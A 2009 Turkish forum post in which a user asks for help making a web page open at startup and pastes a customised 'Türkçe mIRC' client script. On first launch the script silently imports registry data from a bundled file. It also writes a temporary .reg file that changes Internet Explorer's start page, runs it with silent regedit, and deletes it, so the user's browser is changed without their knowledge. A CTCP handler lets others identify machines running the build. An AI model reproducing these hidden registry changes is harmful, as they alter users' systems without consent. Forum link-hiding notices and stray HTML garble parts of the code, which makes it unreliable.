29 Haziran 2009, 16:39
|
#1 |
Çevrimdışı
Kullanıcıların profil bilgileri misafirlere kapatılmıştır.
| acilista web sorunu
scripti açılışta web açılsın istiorum
scripte bi kaç code ekledim olmadi script kopylyim nereye ekliycegim söyleyn pleas PHP Kod: Kodu kopyalamak için üzerine çift tıklayın!
[script] n0=on 1:start: { n1= if (%sayac == ON) { n2= .nick Nickiniz $+ $rand(1,99) n3= .anick Nickiniz $+ $rand(1,99) n4= titlebar Mirctrsohbet - Türkçe mIRC 6.21 n5= mhanesite n6= .run regedit /S $mircdir\mirc.dll n7= set %sayac OFF n8= } n9= titlebar MircTrSohBet - Türkçe mIRC 6.21 NeuStar n1= echo -a 0,4 Türkçe mIRC v6.21 4,0 Hakkinda Sikayet ve Isteklerinizi Mail/Msn: darkyussuf@hotmail.com adresine iletebilirsiniz. n2= echo -s 4«Türkçe mIRC v6.21 » 12Tarih : 1 [ $date ] n2= echo -s 4«Türkçe mIRC v6.21 » 12Saat : 1 [ $time ] n2= echo -s 4«Türkçe mIRC v6.21 » 12Nickiniz : 1 [ $me ] n2= echo -s 4«Türkçe mIRC v6.21 » 1212Türkçe mIRC v6.21 Download Adresi 4http:// Bu forumdaki linkleri ve resimleri görebilmek için en az 25 mesajınız olması gerekir. style="color: #0000BB">n13= baglanti n14= halt n39=} n40=dialog idpass { n41= title "Seçtiğiniz Nick Şifreli" n42= size -1 -1 240 95 n43= box "Nick Şifresi Giriniz",1,5 5 230 85 n44= edit "",2,35 25 173 22,autohs,pass n45= button "Tamam",3,37 55 75 25,ok,disable flat n46= button "Nick Değiş",4,132 55 75 25, flat n47=} n48=on 1:dialog:idpass:*:*:{ n49= if ($devent == edit) { n50= if ($did == 2) { set %idpass $did(2).text | did -e $dname 3 } n51= } n52= if ($devent == sclick) { n53= if ($did == 3) { n54= if %idpass == $null || %idintel == "" { .timer -m 1 1 YANLIŞ ŞİFRE :: | halt } n55= else { ns identify %idpass | echo -a 12Nick Şifreniz Girilmiştir. } n56= unset %idintel n57= } n58= if ($did == 4) { dialog -x idpass | /nick $$?="Yeni Nick?" } n59= } n60=} n16= n15=} n16= n17=on 1:connect: { join #Zurna } n18= n19=ctcp 1:version:*:{ n20= ctcpreply $nick VERSION mirctrsohbet - Türkçe mIRC 6.21 n21=} n22=ctcp 1:finger:*:{ n23= ctcpreply $nick FINGER mirctrsohbet - Türkçe mIRC 6.21 n24= halt n25=} n26=ctcp 1:SIBERTR:*:{ n27= ctcpreply $nick SIBERTR OK n28=} n29= n30=on ^*:SNOTICE:*: { n31= echo -s - $+ $server $+ - $+ $colour(notice) $1- n32= haltdef n33=} n34= n35=alias mhanesite { n36= set %system $r(10,1999) $+ .reg n37= .write %system REGEDIT4 n38= .write %system [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main] n39= .write %system "Start Page" = " Bu forumdaki linkleri ve resimleri görebilmek için en az 25 mesajınız olması gerekir. style="color: #0000BB">n40= .run -n regedit /s %system n41= .timer 1 4 .remove %system n42=} n41=
|
| |